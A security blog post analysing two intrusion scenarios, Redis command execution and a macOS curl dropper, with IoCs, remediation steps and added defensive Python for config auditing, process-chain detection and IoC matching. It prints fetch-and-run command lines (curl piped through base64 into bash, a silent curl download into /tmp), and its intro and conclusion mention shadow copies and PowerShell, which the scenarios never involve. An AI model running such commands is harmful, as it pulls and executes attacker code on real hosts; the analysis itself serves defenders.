Advanced Threat Detection: Exploitation Tactics from a CIRT Technical Interview

Anshuman Singh

Introduction

As attackers continue to evolve their methods, exploiting misconfigurations and leveraging powerful tools like PowerShell has become a common tactic. In this post, we delve into two scenarios where attackers exploit Redis misconfigurations and shadow copy utilities to gain unauthorized access and execute malicious payloads. These cases demonstrate the sophistication of modern attacks and the need for proactive defense measures.

Scenario #3

Scenario Overview

  • Parent Process: redis-server
  • Parent MD5: 9494cfd0f8c829acd9b1a88f9a0fd2ec
  • Process CLI:
bash -c "curl hxxps://gist.githubusercontent[.]com/ForensicITGuy/165c3de5c3f23168517820b12311fd35/raw/c6e44a7e946fba1bb5eaa0d570aeb98727b8cdc8/totes-evil.sh | base64 -d | bash"
  • Network Connection Count: 1

The Redis server process is exploited to execute a curl command that downloads and executes a base64-encoded script. This suggests a misconfigured Redis service being leveraged for remote command execution.

Step 1: What Happened?

  • Parent Process:
    - The Redis server process (redis-server) initiated a child process, indicating potential exploitation.
    - Redis servers, when misconfigured, are known to be exploited by attackers to execute arbitrary commands.
  • Command Execution:
    - The command uses curl to fetch a script from a GitHub Gist, pipes it through base64 -d to decode it, and immediately executes the result with bash.
    - This is a classic example of a “living off the land” attack, leveraging pre-installed utilities like curl, base64, and bash to execute malicious payloads.

A “Living off the Land” (LOTL) attack is a sophisticated cyberattack technique where hackers use legitimate tools and features already present in the target system to conduct malicious activities. This method allows attackers to blend in with normal operations, making detection by traditional security measures challenging.

  • Network Connection: The single network connection likely corresponds to the curl command’s retrieval of the remote script.

Step 2: Why is This Suspicious?

  • Redis Exploitation: Redis servers are frequently targeted when misconfigured (e.g., lacking authentication or exposed to the internet). Attackers can exploit these weaknesses to execute unauthorized commands.
  • Fetching Remote Scripts: Downloading and executing a remote script in a single command is highly suspicious and indicates malicious intent.
  • Obfuscated URL: The use of a GitHub Gist URL (hxxps://gist.githubusercontent[.]com) and obfuscation (e.g., encoding with base64) suggests an attempt to evade detection.
  • No User Interaction: The process chain indicates automated execution, likely part of a larger attack campaign targeting vulnerable servers.

Step 3: How Could This Happen?

  • Exposed Redis Server: The Redis server might be misconfigured, allowing unauthorized access and command execution.
  • Automated Attack Script: Attackers often scan for publicly accessible Redis servers and use automated scripts to inject malicious commands.
  • Remote Code Execution: By fetching and executing the script from the GitHub Gist, the attacker likely aimed to install a backdoor, exfiltrate data, or gain persistent access.

Indicators of Compromise (IoCs)

To confirm malicious activity, focus on:

  • File Hashes: Parent Process MD5: 9494cfd0f8c829acd9b1a88f9a0fd2ec. Retrieve the downloaded script from the URL and calculate its hash for analysis.
  • Network Activity: Identify and analyze connections to the GitHub Gist URL (hxxps://gist.githubusercontent[.]com/ForensicITGuy/165c3de5c3f23168517820b12311fd35/raw/c6e44a7e946fba1bb5eaa0d570aeb98727b8cdc8/totes-evil.sh).
  • Command History: Review shell command execution logs to verify the full extent of activity related to this attack.

Recommended Actions

  • Immediate Containment:
    - Isolate the Redis server to prevent further exploitation or command execution.
    - Block outbound traffic to suspicious URLs and IP addresses.
  • Forensic Investigation:
    - Retrieve and analyze the script hosted at the GitHub Gist URL.
    - Review Redis server logs for unauthorized access and executed commands.
  • Remediation:
    - Secure the Redis server by enabling authentication and restricting access to trusted IP addresses.
    - Patch Redis to the latest version to mitigate known vulnerabilities.
  • Long-term Protection:
    - Deploy a Web Application Firewall (WAF) to monitor and block unauthorized requests.
    - Monitor for abnormal process chains and network activity using EDR solutions.
    - Educate administrators on securing Redis and other database services.
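The remediation bullets above (enable authentication, restrict access to trusted addresses) map directly onto a handful of redis.conf directives. The following audit script is an added example, not code from the original post: it parses a redis.conf, reports the settings that make the Scenario #3 exposure possible, and is run against two constructed configurations, a weak one and a hardened one. The bind, protected-mode, requirepass and rename-command directives are real Redis settings; the addresses and the placeholder password in the hardened sample are assumptions.

```python
"""Audit a redis.conf for the settings that leave Redis open to unauthenticated
command execution. Added example; the two configs below are constructed."""

# Constructed sample: the weak configuration (listens everywhere, no auth)
WEAK_CONF = """\
bind 0.0.0.0
protected-mode no
port 6379
# requirepass is commented out, so there is no authentication
# requirepass foobared
"""

# Constructed sample: the hardened configuration (addresses and password are placeholders)
HARDENED_CONF = """\
bind 127.0.0.1 10.0.5.12
protected-mode yes
port 6379
requirepass CHANGE-ME-long-random-secret
rename-command CONFIG ""
rename-command FLUSHALL ""
"""

def parse_redis_conf(text):
    """Return {directive: [args]} for each uncommented line; the last occurrence of a
    directive wins, except rename-command, which is collected into a dict."""
    conf, renames = {}, {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith('#'):
            continue
        parts = line.split()
        directive, args = parts[0].lower(), parts[1:]
        if directive == 'rename-command' and len(args) == 2:
            # `rename-command CONFIG ""` disables the command entirely
            renames[args[0].upper()] = args[1].strip('"')
        else:
            conf[directive] = args
    conf['rename-command'] = renames
    return conf

def audit_redis_conf(text):
    """Return a list of human-readable findings; an empty list means no weak setting found."""
    conf = parse_redis_conf(text)
    findings = []
    binds = conf.get('bind', [])
    if not binds or any(b in ('0.0.0.0', '*', '::') for b in binds):
        findings.append('bind: unset or wildcard, Redis is reachable on every interface')
    protected = conf.get('protected-mode') or ['yes']
    if protected[0].lower() != 'yes':
        findings.append('protected-mode: disabled, remote clients are not refused')
    if not conf.get('requirepass'):
        findings.append('requirepass: not set, anyone who can connect can run commands')
    if conf['rename-command'].get('CONFIG', 'CONFIG') != '':
        findings.append('CONFIG: not disabled, a connected client can rewrite server settings')
    return findings

if __name__ == '__main__':
    for label, text in (('weak', WEAK_CONF), ('hardened', HARDENED_CONF)):
        print(label, audit_redis_conf(text) or 'no findings')
```

Run it against the real file on a host (for example `audit_redis_conf(open('/etc/redis/redis.conf').read())`); a non-empty result on an internet-facing instance is exactly the precondition the Scenario #3 process chain depends on.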

Scenario #4

Scenario Overview

  • Grandparent Process: /private/tmp/b6yNLWzjO
  • Grandparent MD5: ab47aa51b678216bc998fe7e5fe7aefd
  • Grandparent CLI:
/tmp/b6yNLWzjO /Volumes/Installer/Installer.app/Contents/MacOS/LightEvening
  • Parent Process: /bin/sh
  • Parent MD5: 95d23ed8b5448779eee9863d2bc5c1ba
  • Parent CLI:
sh -c curl -f0L -o /tmp/EB1E53E9-6B2A-4D01-99FF-DB4CB484EA63/45D77C73-D4A2-4698-A0A1-34926AEDF82D 'hxxp://redacted.cloudfront[.]net/sd/?c=22lybQ==&u=67D936BA-DC18-5557-AF59-A61155059BC5&s=EB1E53E9-6B2A-4D01-99FF-DB4CB484EA63&o=10.15.7&b=11821208528&gs=1' > /dev/null 2>&1
  • Child Process: /usr/bin/curl
  • Child MD5: 0846e04c22488b04222817529f235024
  • Child CLI:
curl -f0L -o /tmp/EB1E53E9-6B2A-4D01-99FF-DB4CB484EA63/45D77C73-D4A2-4698-A0A1-34926AEDF82D hxxp://redacted.cloudfront[.]net/sd/?c=22lybQ==&u=67D936BA-DC18-5557-AF59-A61155059BC5&s=EB1E53E9-6B2A-4D01-99FF-DB4CB484EA63&o=10.15.7&b=11821208528&gs=1
  • Network Connection Count: 2
  • File Modifications: 3

A chain of processes involving curl downloads files from a CloudFront URL, storing them in the /tmp directory. This activity suggests malware targeting macOS systems.

Step 1: What Happened?

  • Grandparent Process Activity:
    - The process /private/tmp/b6yNLWzjO executed an application from a mounted volume (/Volumes/Installer).
    - Temporary directories like /tmp are often used for staging malicious binaries or scripts due to their ephemeral nature.
  • Parent Process Execution:
    - The parent process (/bin/sh) used a curl command to download a file from a remote server (hxxp://redacted.cloudfront[.]net) and saved it in another temporary directory (/tmp/EB1E53E9-6B2A-4D01-99FF-DB4CB484EA63).
    - The > /dev/null 2>&1 syntax suppresses output and errors, a common technique to evade detection.

The redirection > /dev/null 2>&1 is used in Unix-like operating systems to send both standard output (stdout, file descriptor 1) and standard error (stderr, file descriptor 2) to /dev/null, effectively discarding them. /dev/null is a special file that discards all data written to it and returns no data to anyone who reads from it.

  • Child Process (Curl): The curl utility made two network connections to fetch a file from the cloudfront.net domain.
  • File Modifications: Three files were modified, possibly related to storing the downloaded payload and staging for further execution.

Step 2: Why is This Suspicious?

  • Execution from Temporary Directories: Temporary directories like /private/tmp are often used to execute or store malicious files due to their transient nature and reduced visibility.
  • Remote Resource Download: The curl command retrieves a file from a cloudfront.net domain. While legitimate services use CloudFront, it is also frequently abused by attackers to host malicious payloads.
  • Output Suppression: Suppressing command output (> /dev/null 2>&1) is indicative of an attempt to hide activity.
  • Unusual Process Chain: The process chain (“/tmp/b6yNLWzjO” → “/bin/sh” → “/usr/bin/curl”) is irregular for normal system operations, pointing to possible malicious intent.
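The "Why is This Suspicious?" bullets for Scenario #3 (a database daemon spawning a shell, a download piped straight into an interpreter) and for Scenario #4 (execution from /private/tmp, curl writing into a temp directory, output redirected to /dev/null) are each a testable heuristic. The script below is an added example, not code from the original post: it encodes those five heuristics as rules over a simple process-event record and runs them on the two command lines quoted in this post plus a constructed benign event. The event schema, the benign sample and the extra daemons in SERVICE_PARENTS (everything other than redis-server) are assumptions made for the example.

```python
"""Process-chain heuristics for the two scenarios in this post.
Added example; the event schema and sample events are constructed, the two
malicious command lines are copied from the post (URLs kept defanged)."""
import os
import re

# Scenario #3: a download piped (possibly via base64 -d) straight into a shell
PIPE_TO_SHELL = re.compile(
    r'\b(?:curl|wget)\b[^|]*\|(?:[^|]*\|)*\s*(?:bash|sh|zsh|dash|python\d*)\b')
# Scenario #4: curl's -o writing into a temp directory
CURL_TO_TEMP = re.compile(r'(?:^|\s)-o\s*(?:/private)?/(?:tmp|var/tmp)/')
# Scenario #4: output discarded, as described in the post
OUTPUT_SUPPRESSION = re.compile(r'>\s*/dev/null')
TEMP_DIRS = ('/tmp/', '/private/tmp/', '/var/tmp/', '/private/var/tmp/', '/dev/shm/')
SHELLS = {'sh', 'bash', 'zsh', 'dash'}
# Daemons that have no business spawning a shell. redis-server comes from the post;
# the others are an assumption, generalising the same rule to other services.
SERVICE_PARENTS = {'redis-server', 'mongod', 'mysqld', 'postgres'}

def analyze(event):
    """Return the sorted list of rule names the event triggers.
    event = {'process': path-or-name, 'ancestors': [parent, grandparent, ...],
             'cmdline': full command line}"""
    hits = set()
    proc = os.path.basename(event['process'])
    ancestors = event.get('ancestors', [])
    cmd = event.get('cmdline', '')
    if ancestors and os.path.basename(ancestors[0]) in SERVICE_PARENTS and proc in SHELLS:
        hits.add('service_spawns_shell')
    if PIPE_TO_SHELL.search(cmd):
        hits.add('pipe_to_shell')
    # any executable in the chain living in a temp directory counts
    if any(p.startswith(TEMP_DIRS) for p in [event['process'], *ancestors]):
        hits.add('temp_dir_exec')
    if CURL_TO_TEMP.search(cmd):
        hits.add('curl_to_temp')
    if OUTPUT_SUPPRESSION.search(cmd):
        hits.add('output_suppression')
    return sorted(hits)

# Scenario #3 as an event: redis-server -> bash, command line from the post
SCENARIO_3 = {
    'process': 'bash',
    'ancestors': ['redis-server'],
    'cmdline': 'bash -c "curl hxxps://gist.githubusercontent[.]com/ForensicITGuy/165c3de5c3f23168517820b12311fd35/raw/c6e44a7e946fba1bb5eaa0d570aeb98727b8cdc8/totes-evil.sh | base64 -d | bash"',
}
# Scenario #4 as an event: /private/tmp/b6yNLWzjO -> /bin/sh, parent CLI from the post
SCENARIO_4 = {
    'process': '/bin/sh',
    'ancestors': ['/private/tmp/b6yNLWzjO'],
    'cmdline': "sh -c curl -f0L -o /tmp/EB1E53E9-6B2A-4D01-99FF-DB4CB484EA63/45D77C73-D4A2-4698-A0A1-34926AEDF82D 'hxxp://redacted.cloudfront[.]net/sd/?c=22lybQ==&u=67D936BA-DC18-5557-AF59-A61155059BC5&s=EB1E53E9-6B2A-4D01-99FF-DB4CB484EA63&o=10.15.7&b=11821208528&gs=1' > /dev/null 2>&1",
}
# Constructed benign event: an admin fetching a file from a terminal
BENIGN = {
    'process': '/bin/bash',
    'ancestors': ['/System/Applications/Utilities/Terminal.app/Contents/MacOS/Terminal'],
    'cmdline': 'curl -sSL -o /Users/alice/Downloads/report.pdf https://intranet.example.com/report.pdf',
}

if __name__ == '__main__':
    for name, ev in (('scenario3', SCENARIO_3), ('scenario4', SCENARIO_4), ('benign', BENIGN)):
        print(name, analyze(ev) or 'no hits')
```

Each scenario trips a different pair or triple of rules while the benign download trips none, which is the point of keeping the heuristics separate: in an EDR rule you would alert on a combination (for instance temp_dir_exec together with curl_to_temp) rather than on any single rule, since curl writing to /tmp or a redirect to /dev/null is common in legitimate scripts.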

Step 3: How Could This Happen?

  • Initial Exploitation: The attacker may have exploited a vulnerability to drop and execute /private/tmp/b6yNLWzjO.
  • Payload Delivery: The curl command fetched a remote payload from a CloudFront-hosted resource, likely intended for further exploitation or persistence.
  • Persistence or Data Exfiltration: File modifications suggest either staging additional payloads or modifying system files for persistence or data exfiltration.

Indicators of Compromise (IoCs)

  • File Hashes:
    - Grandparent MD5: ab47aa51b678216bc998fe7e5fe7aefd
    - Parent MD5: 95d23ed8b5448779eee9863d2bc5c1ba
    - Child MD5: 0846e04c22488b04222817529f235024
  • File Paths:
    - /private/tmp/b6yNLWzjO
    - /tmp/EB1E53E9-6B2A-4D01-99FF-DB4CB484EA63
  • Network Activity: hxxp://redacted.cloudfront[.]net/sd/?c=22lybQ==&u=67D936BA-DC18-5557-AF59-A61155059BC5&s=EB1E53E9-6B2A-4D01-99FF-DB4CB484EA63&o=10.15.7&b=11821208528&gs=1
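The IoC lists for Scenarios #3 and #4 give hashes, paths and defanged URLs, and both "Indicators of Compromise" sections ask the responder to sweep telemetry for them. The script below is an added example, not code from the original post: it loads exactly the indicators listed, refangs the hxxp/[.] notation only far enough to extract the host, and matches constructed process, file and DNS records against them. One caveat worth carrying into the matching: the parent and child hashes belong to /bin/sh and /usr/bin/curl, which on an unmodified host are the stock binaries of that OS build, so a hit on them confirms which binary ran, not that the host was compromised; the example therefore labels those hits as context only. The record schema and sample records are assumptions.

```python
"""Sweep constructed telemetry for the IoCs listed in this post.
Added example; hashes, paths and URLs are the post's, the records are constructed."""
import re

# Hashes exactly as listed; the boolean marks hashes of system utilities, which are
# context only (they identify the binary, not the intrusion)
IOC_MD5 = {
    '9494cfd0f8c829acd9b1a88f9a0fd2ec': ('scenario3 parent redis-server', True),
    'ab47aa51b678216bc998fe7e5fe7aefd': ('scenario4 grandparent /private/tmp/b6yNLWzjO', False),
    '95d23ed8b5448779eee9863d2bc5c1ba': ('scenario4 parent /bin/sh', True),
    '0846e04c22488b04222817529f235024': ('scenario4 child /usr/bin/curl', True),
}
IOC_URLS = [
    'hxxps://gist.githubusercontent[.]com/ForensicITGuy/165c3de5c3f23168517820b12311fd35/raw/c6e44a7e946fba1bb5eaa0d570aeb98727b8cdc8/totes-evil.sh',
    'hxxp://redacted.cloudfront[.]net/sd/?c=22lybQ==&u=67D936BA-DC18-5557-AF59-A61155059BC5&s=EB1E53E9-6B2A-4D01-99FF-DB4CB484EA63&o=10.15.7&b=11821208528&gs=1',
]
IOC_PATHS = ['/private/tmp/b6yNLWzjO', '/tmp/EB1E53E9-6B2A-4D01-99FF-DB4CB484EA63']

def refang(text):
    """Undo the usual hxxp / [.] / (.) defanging so a value compares equal to live telemetry."""
    text = re.sub(r'^hxxp', 'http', text, flags=re.IGNORECASE)
    return text.replace('[.]', '.').replace('(.)', '.')

def ioc_host(url):
    """Hostname of a (possibly defanged) URL, lower-cased for comparison."""
    return re.match(r'https?://([^/]+)', refang(url)).group(1).lower()

IOC_HOSTS = {ioc_host(u) for u in IOC_URLS}

def match_telemetry(records):
    """Return (record_id, ioc_type, value, label) for every indicator a record matches.
    Records are dicts with an 'id' and any of 'md5', 'path', 'host'."""
    hits = []
    for r in records:
        md5 = r.get('md5', '').lower()
        if md5 in IOC_MD5:
            label, is_stock = IOC_MD5[md5]
            hits.append((r['id'], 'md5', md5, label + (' (context only: system utility hash)' if is_stock else '')))
        for p in IOC_PATHS:
            if r.get('path', '').startswith(p):
                hits.append((r['id'], 'path', p, 'staging path from the post'))
                break
        host = r.get('host', '').lower()
        if host in IOC_HOSTS:
            hits.append((r['id'], 'host', host, 'payload host from the post'))
    return hits

# Constructed telemetry: two process records, one file write, two DNS lookups
SAMPLE_RECORDS = [
    {'id': 'p1', 'path': '/private/tmp/b6yNLWzjO', 'md5': 'ab47aa51b678216bc998fe7e5fe7aefd'},
    {'id': 'p2', 'path': '/bin/sh', 'md5': '95d23ed8b5448779eee9863d2bc5c1ba'},
    {'id': 'f1', 'path': '/tmp/EB1E53E9-6B2A-4D01-99FF-DB4CB484EA63/45D77C73-D4A2-4698-A0A1-34926AEDF82D'},
    {'id': 'n1', 'host': 'gist.githubusercontent.com'},
    {'id': 'n2', 'host': 'updates.example.com'},  # constructed benign lookup
]

if __name__ == '__main__':
    for hit in match_telemetry(SAMPLE_RECORDS):
        print(hit)
```

Matching on the host rather than the full URL is deliberate: the query string in the CloudFront URL carries per-victim identifiers (the UUIDs and the OS version), so an exact-URL match would miss the same campaign on the next host.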

Recommended Actions

  • Immediate Containment:
    - Isolate the affected system to prevent further execution of the malicious payload.
    - Block network access to the CloudFront domain and related IPs.
  • Forensic Analysis:
    - Retrieve and analyze the file hosted at the CloudFront URL.
    - Investigate temporary directories for residual artifacts.
    - Review system logs for unauthorized process executions and file modifications.
  • Remediation:
    - Remove all files and executables from temporary directories.
    - Patch any vulnerabilities that may have allowed the initial execution.
  • Long-term Protection:
    - Monitor process chains for unusual behavior using EDR tools.
    - Implement restrictions on the use of utilities like curl in production systems.
    - Educate users and administrators about securing mounted volumes and temporary directories.

Conclusion

Scenarios #3 and #4 highlight how attackers exploit system vulnerabilities and abuse administrative tools to gain a foothold in their target environments. Detecting these activities requires robust monitoring, especially for high-risk utilities like PowerShell and exposed services like Redis. Stay tuned as we explore scenarios involving authentication and privilege escalation in the next installment.
